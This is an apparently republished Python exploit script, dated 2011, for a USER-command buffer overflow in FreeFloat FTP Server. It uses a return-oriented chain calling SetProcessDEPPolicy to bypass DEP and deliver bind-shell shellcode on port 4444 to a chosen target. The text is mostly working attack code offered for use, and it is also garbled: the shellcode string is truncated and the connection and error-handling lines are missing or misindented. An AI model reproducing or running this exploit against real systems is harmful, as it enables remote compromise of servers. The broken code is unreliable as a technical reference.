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FreeFloat FTP Server Buffer Overflow Exploit (DEP Bypass)
来源:vfocus.net 作者:Blake 发布时间:2011-09-26  

import socket, sys
from struct import pack

print "\n==============================="
print "Freefloat FTP Server DEP Bypass"
print "       Written by Blake        "
print "===============================\n"

if len(sys.argv) != 3:
 print "[*] Usage: %s <target> <port>\n" % sys.argv[0]

target = sys.argv[1]
port = int(sys.argv[2])

# 728 bytes for shellcode
#Bind Shell shellcode port 4444
shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"

buffer = "\x41" * 230
eip = pack('<L',0x77f613ac)  # RETN - shlwapi
rop = "\x42" * 8   # compensate
rop += pack('<L',0x77c2362c)  # POP EBX, RETN - msvcirt
rop += "\xff\xff\xff\xff"
rop += pack('<L',0x77c127e1)  # INC EBX, RETN
rop += pack('<L',0x5d093466)  # POP EBP, RETN
rop += pack('<L',0x7c8622a4)  # SetProcessDEPPolicy
rop += pack('<L',0x5d095470)  # POP EDI, RETN
rop += pack('<L',0x5d095471)  # RETN
rop += pack('<L',0x5d0913b4)  # POP ESI, RETN
rop += pack('<L',0x5d095471)            # RETN
rop += pack('<L',0x77e7d102)   # PUSHAD # RETN - RPCRT4


nops = "\x90" * 10
junk = "\x42" * (1000 - len(buffer + eip + rop + nops + shellcode))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port)
 print "[+] Sending payload"
 s.send("USER " + buffer + eip + rop + nops + shellcode + junk + "\r\n")
 print "[+] Exploit successfully sent"
 print "[X] Unable to connect to %s" % target

raw_input("[+] Press any key to exit\n")

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